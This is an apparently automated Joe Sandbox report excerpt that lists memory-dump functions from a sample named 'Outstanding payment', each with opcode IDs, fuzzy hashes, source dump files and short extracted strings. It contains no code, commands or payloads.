Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b2f0000_Outstanding payment.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8189e33be5262dd3c4b5b18f832a540f0b6b1faf16570255865f3e68ca8cf881
Instruction ID: 7574561239ae19d241793d9a53fc8bdc08c3debab6537a18902ccead4290dd50
Opcode Fuzzy Hash: 8189e33be5262dd3c4b5b18f832a540f0b6b1faf16570255865f3e68ca8cf881
Instruction Fuzzy Hash: 7BF0FFB8D102099FCB54DFB8C5456AEFBF0FB48301F0084AAD819A3380EB755A00CB91

Function 0B2FA9DE Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2119784756.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b2f0000_Outstanding payment.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8fa988e1e4229d03d8c7e57e605fdf67220c7769fa876a089aede6b3339a8dcb
Instruction ID: dc02c3f42067c2f67c4ac816d56e2d5c40839a6ee92e02fdac5fc64ebb1aed0d
Opcode Fuzzy Hash: 8fa988e1e4229d03d8c7e57e605fdf67220c7769fa876a089aede6b3339a8dcb
Instruction Fuzzy Hash: 33E06539A9A58A8FDB15CB6499C1ADCB77DEB4B214F0053F5C10D97125D674098DCE01

Function 0B2F8858 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2119784756.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b2f0000_Outstanding payment.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a80bedcc95df371c57291bd2e4e9f0565be2f00ab7ddb1c193eed363a2e4083
Instruction ID: 184a8d2857a3d075965e4037bae48a7342bcaef73db3166701fb6b9b95531b3b
Opcode Fuzzy Hash: 2a80bedcc95df371c57291bd2e4e9f0565be2f00ab7ddb1c193eed363a2e4083
Instruction Fuzzy Hash: C2F0F230E24208DFCB90DFB8C484698BFF0EB09211F0481EAD808D7361D2369944CF41

Function 0B2FC8C6 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2119784756.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b2f0000_Outstanding payment.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff16a06b637c76575d87820e53e669fa6c8e3f58a0e97a8532415924a9ffb0f4
Instruction ID: dd0539e28ae7381ced76c553a3a1c217914fcbded22cd39b8dcde1c129d3b04a
Opcode Fuzzy Hash: ff16a06b637c76575d87820e53e669fa6c8e3f58a0e97a8532415924a9ffb0f4
Instruction Fuzzy Hash: 2CF08C3492D288DFC710CF69D481CB8BBFAFF8A60070450A4E5298B247C374A402CF00

Function 0B2F8628 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2119784756.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b2f0000_Outstanding payment.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d0d57e82440af0f54fca7b32d8f33d8d71f2c3c7fdab95805a7dd0945326fcc
Instruction ID: 7c3a5c7b99d8cfda55183e18c7948bddb43a95c9e45456f38c856824b62b05ab
Opcode Fuzzy Hash: 8d0d57e82440af0f54fca7b32d8f33d8d71f2c3c7fdab95805a7dd0945326fcc
Instruction Fuzzy Hash: 20E0C270D2824AEFCB51DBB8D45428CBFF1EB0A201F1089EAD548EB351E6369A54CF81

Function 0B2FB980 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2119784756.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b2f0000_Outstanding payment.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d8cc2ad23adb69854421f022312b974f2ad5e77004100e2b3367c75b3e78f2e
Instruction ID: 4b5c01028a7c680aaf8ed75b8b316e595c8a57a9a944d27d3f23ff253d317ad4
Opcode Fuzzy Hash: 8d8cc2ad23adb69854421f022312b974f2ad5e77004100e2b3367c75b3e78f2e
Instruction Fuzzy Hash: FFE0D8B1A09308DFC702DF68E50519CBF31AB42211F1040EDD44457296C7365A45DB92

Function 0B2F2D60 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2119784756.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b2f0000_Outstanding payment.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3ff5cdc3b8ae22adac2d774cf5166b35358a4eb64d7f2fe12307f92e4c201c3
Instruction ID: acf4e3ceb15628a302a2d46a3bd423c7ca22d79b46ed00c1387bf5b1d751ebdb
Opcode Fuzzy Hash: f3ff5cdc3b8ae22adac2d774cf5166b35358a4eb64d7f2fe12307f92e4c201c3
Instruction Fuzzy Hash: FEE09235514314CFCB108FA8F9458947330FF49322F1002E5E826973A2CB368E42CF50

Function 0B2FA568 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2119784756.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b2f0000_Outstanding payment.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 782fd27090ada5cb250b115cec4683b95d1f272cddde050d200a73266944d146
Instruction ID: 3c55d73fe949525a482872eaeb0cf9bf53b8499fffc2022270d28183e1b62d9b
Opcode Fuzzy Hash: 782fd27090ada5cb250b115cec4683b95d1f272cddde050d200a73266944d146
Instruction Fuzzy Hash: 53E0C2B0D11209EFCB44EFA8C8416AEBBB1FB08301F5086AAD818A3340D775A651DF81

Function 0B2F8868 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2119784756.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b2f0000_Outstanding payment.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e474bbbcf8992469099347b22588198d1e25dc61a6b78b35c856a664a9ea9cc
Instruction ID: 14e1cca1bf00615a5d8f50177d9fc6f9d52ec187f205dbf116333ee566b26c25
Opcode Fuzzy Hash: 4e474bbbcf8992469099347b22588198d1e25dc61a6b78b35c856a664a9ea9cc
Instruction Fuzzy Hash: A6E07574D20208DFC754EFA9D445A9DBBF4EB08615F4481A9D80897351E7359950CF41

Function 0B2FAFB4 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2119784756.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b2f0000_Outstanding payment.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c83a228a93bafdd6ec8527845f65d8868e51c6c12500e0feb4a48ca91c3ee2ce
Instruction ID: 705b9bb984d5efad834cb13551b33599e5e0b7886463323ef1549dc26fe0ab1a
Opcode Fuzzy Hash: c83a228a93bafdd6ec8527845f65d8868e51c6c12500e0feb4a48ca91c3ee2ce
Instruction Fuzzy Hash: FDE0B6B0A2921ACBCB04CFA4E4C59AEBBB9AB4A710F105528E51DEA240D371A880CB51

Function 0B2FC1A3 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2119784756.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b2f0000_Outstanding payment.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80e5e40936a6efe78028ab98589e21abe4f2ae2cc64d311d1167e0b134258ade
Instruction ID: b865d704384b9e983244de64cb378ba184d3f37c9fcef607274f9cd394f8bebb
Opcode Fuzzy Hash: 80e5e40936a6efe78028ab98589e21abe4f2ae2cc64d311d1167e0b134258ade
Instruction Fuzzy Hash: FDE0DF30429316CFC3108B68D688464BB79FB4E222B005AA9D42E572A2C7359C49CF00

Function 0B2F2D48 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2119784756.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b2f0000_Outstanding payment.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45877147a77258c58b290fffddd8cf5e60bd55887096a5bc71a7a2c883c7f2a1
Instruction ID: 36658dc8e3ac51b665daf2fc3d18ab56e9a176129c682d5a968922f03f0df9e1
Opcode Fuzzy Hash: 45877147a77258c58b290fffddd8cf5e60bd55887096a5bc71a7a2c883c7f2a1
Instruction Fuzzy Hash: 3BE01236611304CFC315DF68E645498B771FF86316B5000A5E50587321DB36D950CF50

Function 0B2FA5A9 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2119784756.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b2f0000_Outstanding payment.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cab57a488c0ffe010fb21166e24dc8fcfbf3b8a2f56ea3c744ef5f8dfc2c1127
Instruction ID: 4e022b246d3983352dd40a2e8eb6f0addada44548314e297af02d4a82879a020
Opcode Fuzzy Hash: cab57a488c0ffe010fb21166e24dc8fcfbf3b8a2f56ea3c744ef5f8dfc2c1127
Instruction Fuzzy Hash: FDD0A7F20197448FD7022374B81B2E87F74DB03121F0A0456F248428A7C5656455DB32

Function 0B2F8638 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2119784756.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b2f0000_Outstanding payment.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df09954f77542b37eb8af7548c408dcc773e46a35f5db89234856359fa00d82d
Instruction ID: 9e56685d38373c98dfda55e751d9e703e0ec70d46802ae86affe61e03a1d2be0
Opcode Fuzzy Hash: df09954f77542b37eb8af7548c408dcc773e46a35f5db89234856359fa00d82d
Instruction Fuzzy Hash: BAE0E270D1020DEFCB50EFB9D44529DFBF4EB08301F4081AA9818A7340E7355A54CF81

Function 0B2FB990 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2119784756.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b2f0000_Outstanding payment.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bdf96dbcd2f053499e19ea278d6ee9bd4fc5797f0905e2d38a2076df20ad2696
Instruction ID: 05647af12afca11a77e1e1860cdd9e11d066abae418e8e54a63041218f4928ae
Opcode Fuzzy Hash: bdf96dbcd2f053499e19ea278d6ee9bd4fc5797f0905e2d38a2076df20ad2696
Instruction Fuzzy Hash: 1CD05E70905308DFDB04DFA8E54969DBB75EB46312F6081ACD80827384C7365A51DF82

Function 0B2F5F38 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2119784756.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b2f0000_Outstanding payment.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65fb76c30194c045abde7629f11424b6ae69f15ed9659d071ae511c275667022
Instruction ID: c4bfd4c0f763ffb3c216b2a6635dc031a4f1ff158b3c7f92f585052cadfbb2f4
Opcode Fuzzy Hash: 65fb76c30194c045abde7629f11424b6ae69f15ed9659d071ae511c275667022
Instruction Fuzzy Hash: 96D0A73082110DDFC710EBB8D40939DB7F4A701205F5001B8890853291E7315E14D7C1

Function 0B2FBF2D Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2119784756.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b2f0000_Outstanding payment.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72abc035745e9221de0a885aa786804518437b51d432a5fa92b0a2284b74f0b4
Instruction ID: 1eca678a3f26fe1e8b06b166bca5de2078bd7cc8b98bd98b4b4b16b10efdb818
Opcode Fuzzy Hash: 72abc035745e9221de0a885aa786804518437b51d432a5fa92b0a2284b74f0b4
Instruction Fuzzy Hash: B7D0173011A324CFC3159B64D6949A47B7AEB8E216B0005E9D00E5B222CB35E984CF10

Function 0B2FA5B8 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2119784756.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b2f0000_Outstanding payment.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5a9669aac7a2381b9b4751da998b0a5e4a47681f3964abc9ab20bc92e9b67be
Instruction ID: 5f6e288bae85feda8b80162ea309281592c6f0ce504a737848663d8ee6d055a8
Opcode Fuzzy Hash: e5a9669aac7a2381b9b4751da998b0a5e4a47681f3964abc9ab20bc92e9b67be
Instruction Fuzzy Hash: 10C08CB0015A088BE20027A8F50F3A876A89702232F480024E30C02494CA649490CE22

Function 0B2FC5FF Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2119784756.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b2f0000_Outstanding payment.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f9e5813fdf0cb73b8a2172021a78c4c90c761747e32a99cd864f6cec1e9c15c
Instruction ID: 00e271d6ad0aeac1a55064aa5a8e85cbf31f925777134ea10c455171d02f386a
Opcode Fuzzy Hash: 2f9e5813fdf0cb73b8a2172021a78c4c90c761747e32a99cd864f6cec1e9c15c
Instruction Fuzzy Hash: 9EC08C75509344CFC3418B28D250498BBB6EB4A201B0109D9D05A8B323CB30ED44CB20

Function 0B2FC4B1 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2119784756.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b2f0000_Outstanding payment.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6005cdd2fb8670405cb491cb18dd865c8b7a2f3621262af91ce45952cc800529
Instruction ID: 97edee3baad3820de7bc02cb28085cbd7c3c5af408181da4aeaa2f6cb4cc0e06
Opcode Fuzzy Hash: 6005cdd2fb8670405cb491cb18dd865c8b7a2f3621262af91ce45952cc800529
Instruction Fuzzy Hash: 72C0803450834DCFD7019F14E8405597F35EB4A210F0040D1D859E3252D7305D54CF61

Function 0B2F0F54 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2119784756.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b2f0000_Outstanding payment.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe0893678363eb4efe565e1a408ef824bab756145b39b009b54df8b37f180e08
Instruction ID: f506415aa086df5491f97c2bdec23fa12f3ba90cbbec917d16f76faa17768339
Opcode Fuzzy Hash: fe0893678363eb4efe565e1a408ef824bab756145b39b009b54df8b37f180e08
Instruction Fuzzy Hash: 36B012755F4302A7880437A48DC1C2FF828FFB1B01B80DC327344400248CB8C838D92B

Function 0B2F74D8 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2119784756.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b2f0000_Outstanding payment.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11358fd7a0206af5fb80634e28944117a3acced95e106c8b92f61f1ac3bbba2a
Instruction ID: 0e83fbff37b49d3a530a77640c1a1c90525db3eed12aee1bd0f77862c9941a79
Opcode Fuzzy Hash: 11358fd7a0206af5fb80634e28944117a3acced95e106c8b92f61f1ac3bbba2a
Instruction Fuzzy Hash: B3C092C266D3C19FE302627088A6849AF104B7770C32A05E693449B1A3C4A8A85ACA2A

Non-executed Functions

Function 0B2F6928 Relevance: 6.5, Strings: 5, Instructions: 282COMMON

Download Yara Rule

Strings

nay, xrefs: 0B2F6BFE
nay, xrefs: 0B2F6BF4
H4ux, xrefs: 0B2F6A00
H4ux, xrefs: 0B2F69E9
H4ux, xrefs: 0B2F69E2

Memory Dump Source

Source File: 00000000.00000002.2119784756.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b2f0000_Outstanding payment.jbxd

Similarity

API ID:
String ID: H4ux$H4ux$H4ux$nay$nay
API String ID: 0-1200253175
Opcode ID: 571227b26b818a91071ec86bb13328dff086a4ae46d63fa9b62aa5e10135aa57
Instruction ID: 23659f6fe3e38574573acb96de809cdc3c27fb544402f461619a0384f4bc33be
Opcode Fuzzy Hash: 571227b26b818a91071ec86bb13328dff086a4ae46d63fa9b62aa5e10135aa57
Instruction Fuzzy Hash: 6EC14B74E2521ACFDB15CFA9C980A9EFBB2FF89300F209169D519AB355D7309A41CF50

Function 0B2F3D70 Relevance: 5.2, Strings: 4, Instructions: 174COMMON

Download Yara Rule

Strings

%O@8, xrefs: 0B2F3ECC
tQ=), xrefs: 0B2F3E06
%O@8, xrefs: 0B2F3EDA
tQ=), xrefs: 0B2F3E0D

Memory Dump Source

Source File: 00000000.00000002.2119784756.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b2f0000_Outstanding payment.jbxd

Similarity

API ID:
String ID: %O@8$%O@8$tQ=)$tQ=)
API String ID: 0-749352435
Opcode ID: f69b112bf8bb52382efbd3057650097c391bc33bd61a610c6148b400a81d07be
Instruction ID: 0da5a40e76094098513f66d4a4e8e13cf3d486a92bb9dff27bd90716b8277e96
Opcode Fuzzy Hash: f69b112bf8bb52382efbd3057650097c391bc33bd61a610c6148b400a81d07be
Instruction Fuzzy Hash: 9471E074E2120A9FCB44CFA9D48499EFBF2FF88350B14956AE515AB324D730AA41CF54

Function 0B2F4920 Relevance: 5.2, Strings: 4, Instructions: 162COMMON

Download Yara Rule

Strings

18', xrefs: 0B2F4A5C
aY, xrefs: 0B2F4B11
aY, xrefs: 0B2F4B0A
18', xrefs: 0B2F4A6A

Memory Dump Source

Source File: 00000000.00000002.2119784756.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b2f0000_Outstanding payment.jbxd

Similarity

API ID:
String ID: 18'$18'$aY$aY
API String ID: 0-3687307736
Opcode ID: 6fdb662617a7d320ffb5bd5f347bff9813246270ac9b0bc1b7765112a2e66ee6
Instruction ID: 83acdaa58e5b51f9964fb26782f3a2da2211ad27949af757f0d4385fbcfe7398
Opcode Fuzzy Hash: 6fdb662617a7d320ffb5bd5f347bff9813246270ac9b0bc1b7765112a2e66ee6
Instruction Fuzzy Hash: BE71E4B4E2120ACFCB04DF99C5819AEFBB1FF88310F14852AD525A7319D374A982CF95

Function 0B2F6918 Relevance: 4.0, Strings: 3, Instructions: 269COMMON

Download Yara Rule

Strings

H4ux, xrefs: 0B2F6A00
H4ux, xrefs: 0B2F69E9
H4ux, xrefs: 0B2F69E2

Memory Dump Source

Source File: 00000000.00000002.2119784756.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b2f0000_Outstanding payment.jbxd

Similarity

API ID:
String ID: H4ux$H4ux$H4ux
API String ID: 0-2732375326
Opcode ID: 0b714b5975417a01ae5ee957a1bc416bdfa3cd08fc2b2d3ec6dbca4a2d79dd30
Instruction ID: e196230ece0abbb40f7c3f5adbd406116cbc4e1e8c05d17569d3ffc66c7e842c
Opcode Fuzzy Hash: 0b714b5975417a01ae5ee957a1bc416bdfa3cd08fc2b2d3ec6dbca4a2d79dd30
Instruction Fuzzy Hash: 65C15D70E2121ACFDB15CFA9C980A9EFBB2FF89300F24916AD519AB355D7309941CF50

Function 0B2F3D61 Relevance: 3.9, Strings: 3, Instructions: 175COMMON

Download Yara Rule

Strings

tQ=), xrefs: 0B2F3E06
%O@8, xrefs: 0B2F3EDA
tQ=), xrefs: 0B2F3E0D

Memory Dump Source

Source File: 00000000.00000002.2119784756.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b2f0000_Outstanding payment.jbxd

Similarity

API ID:
String ID: %O@8$tQ=)$tQ=)
API String ID: 0-2920369752
Opcode ID: 8d3d943457cee0212ea33aaffaa56299062c6e5cb00b001f0ad25813181157a8
Instruction ID: c1799fbb074e9d27dcaf29f679f06c985a2e144fcfeeaa7764a978565e3c1b52
Opcode Fuzzy Hash: 8d3d943457cee0212ea33aaffaa56299062c6e5cb00b001f0ad25813181157a8
Instruction Fuzzy Hash: 8471F074E2520A9FCB48CFA9D48499EFBF2FF88350F14856AE515AB324D730AA41CF54

Function 01095210 Relevance: 3.9, Strings: 3, Instructions: 160COMMON

Download Yara Rule

Strings

wz(, xrefs: 01095325
wz(, xrefs: 0109532C
wz(, xrefs: 0109526E

Memory Dump Source

Source File: 00000000.00000002.2111035589.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1090000_Outstanding payment.jbxd

Similarity

API ID:
String ID: wz($wz($wz(
API String ID: 0-1325214828
Opcode ID: 4377481091b6cd0ff59fb83d0f4b30cc23d457403a03541d82bcb68a18fe3411
Instruction ID: cef06d66f5416c454553ccd56d9fc1a61ac75a73dd9b1a1871296a5e11cd2b66
Opcode Fuzzy Hash: 4377481091b6cd0ff59fb83d0f4b30cc23d457403a03541d82bcb68a18fe3411
Instruction Fuzzy Hash: D76126B4E0520ADFCF05CFAAD8915EEBBB1BF89340F18C466E451AB254D7349A42CF91

Function 0B2F5438 Relevance: 3.9, Strings: 3, Instructions: 119COMMON

Download Yara Rule

Strings

,uRR, xrefs: 0B2F5520
6yu[, xrefs: 0B2F559E
6yu[, xrefs: 0B2F5597

Memory Dump Source

Source File: 00000000.00000002.2119784756.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b2f0000_Outstanding payment.jbxd

Similarity

API ID:
String ID: ,uRR$6yu[$6yu[
API String ID: 0-86511755
Opcode ID: 8a79578f32180e6e7d33c7cc2decc50854d778515c6102367d7639b90c49b067
Instruction ID: 04605b90fa35ae052a9191a2213fed9e61b155886602a68773251201bbc28e16
Opcode Fuzzy Hash: 8a79578f32180e6e7d33c7cc2decc50854d778515c6102367d7639b90c49b067
Instruction Fuzzy Hash: 7C4117B0E2560ADFCB04CFA9C5825AEFBF2BF99340F24C46AC514A7254D7309A41CF95

Function 0B2F5448 Relevance: 3.9, Strings: 3, Instructions: 114COMMON

Download Yara Rule

Strings

,uRR, xrefs: 0B2F5520
6yu[, xrefs: 0B2F559E
6yu[, xrefs: 0B2F5597

Memory Dump Source

Source File: 00000000.00000002.2119784756.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b2f0000_Outstanding payment.jbxd

Similarity

API ID:
String ID: ,uRR$6yu[$6yu[
API String ID: 0-86511755
Opcode ID: b6b7aee035af32dbfdd8a11016968b8bc36cf7834e792cb175d2e6ef237eb70a
Instruction ID: ff132bddf8d53a9f8bf446e078daff655e6ee476d75af576c26e34a2d6ee0cb0
Opcode Fuzzy Hash: b6b7aee035af32dbfdd8a11016968b8bc36cf7834e792cb175d2e6ef237eb70a
Instruction Fuzzy Hash: 264105B0E2560ADFCB04CFA9C5825AEFBF2BB88341F24D46AC514A7254E3749A41CF94

Function 010959D8 Relevance: 3.9, Strings: 3, Instructions: 114COMMON

Download Yara Rule

Strings

`Gap, xrefs: 01095AC0
J1, xrefs: 01095A8A
`Gap, xrefs: 01095AB9

Memory Dump Source

Source File: 00000000.00000002.2111035589.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1090000_Outstanding payment.jbxd

Similarity

API ID:
String ID: `Gap$`Gap$J1
API String ID: 0-140202310
Opcode ID: e116ec87916be4caff32ab0456d11c29fec8dafb5af9b62c6139aeeaa3d6a08a
Instruction ID: 40c4b1dc290fc947fbbf82f96ed574627f4c2b422dee82f923934b75601d7e9c
Opcode Fuzzy Hash: e116ec87916be4caff32ab0456d11c29fec8dafb5af9b62c6139aeeaa3d6a08a
Instruction Fuzzy Hash: 94410BB0E0520ADFCF05CFAAC9915AEFBB2BF88300F24D56AC515A7254D7349A419F94

Function 0B2F7F78 Relevance: 2.8, Strings: 2, Instructions: 299COMMON

Download Yara Rule

Strings

9u"K, xrefs: 0B2F8033
Zjsq, xrefs: 0B2F8036

Memory Dump Source

Source File: 00000000.00000002.2119784756.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b2f0000_Outstanding payment.jbxd

Similarity

API ID:
String ID: 9u"K$Zjsq
API String ID: 0-1261923490
Opcode ID: bbece5f6b0dd0b5aec1059cca3ee1633e339f388830c67e30f3b8819985c3a1c
Instruction ID: 110a11fa36881319c6b5fafb41817248f39dc9378d9e48d8f303a6362f2b9bf2
Opcode Fuzzy Hash: bbece5f6b0dd0b5aec1059cca3ee1633e339f388830c67e30f3b8819985c3a1c
Instruction Fuzzy Hash: ECC1F670E1521ADFCB18CFAAD58099EFBF2BF89340F54D52AD419AB228D7709942CF50

Function 0B2F7F88 Relevance: 2.8, Strings: 2, Instructions: 295COMMON

Download Yara Rule

Strings

9u"K, xrefs: 0B2F8033
Zjsq, xrefs: 0B2F8036

Memory Dump Source

Source File: 00000000.00000002.2119784756.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b2f0000_Outstanding payment.jbxd

Similarity

API ID:
String ID: 9u"K$Zjsq
API String ID: 0-1261923490
Opcode ID: 8df66cf7ddd0494afa321bd0625546a701bd2b07df0efea449e6115c75691c3f
Instruction ID: 0fa559d6d10659ec6db8c4cd63ec23ceca986e4b7e509b696d4ae4631986d0ec
Opcode Fuzzy Hash: 8df66cf7ddd0494afa321bd0625546a701bd2b07df0efea449e6115c75691c3f
Instruction Fuzzy Hash: 85C10670E1521ADFCB08CFAAD58099EFBF2BF89340F54D52AD419AB228D7709942CF50

Function 010943B0 Relevance: 2.7, Strings: 2, Instructions: 182COMMON

Download Yara Rule

Strings

eMU, xrefs: 010945B2
YX7p, xrefs: 010945FB

Memory Dump Source

Source File: 00000000.00000002.2111035589.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1090000_Outstanding payment.jbxd

Similarity

API ID:
String ID: YX7p$eMU
API String ID: 0-1002036398
Opcode ID: e14d70acb695f6c0ff783b616aaa350a62575240edefcedaf674a9cf9c039010
Instruction ID: 016de0f1470ef82b3e2f327c744b6a14f81dd7050fa4925d292c96981c8b5026
Opcode Fuzzy Hash: e14d70acb695f6c0ff783b616aaa350a62575240edefcedaf674a9cf9c039010
Instruction Fuzzy Hash: 7381D074E19209DFCB48CFA9D59499EFBF1FF88210B14C56AE458EB220D734AA42CB50

Function 010943C0 Relevance: 2.7, Strings: 2, Instructions: 180COMMON

Download Yara Rule

Strings

eMU, xrefs: 010945B2
YX7p, xrefs: 010945FB

Memory Dump Source

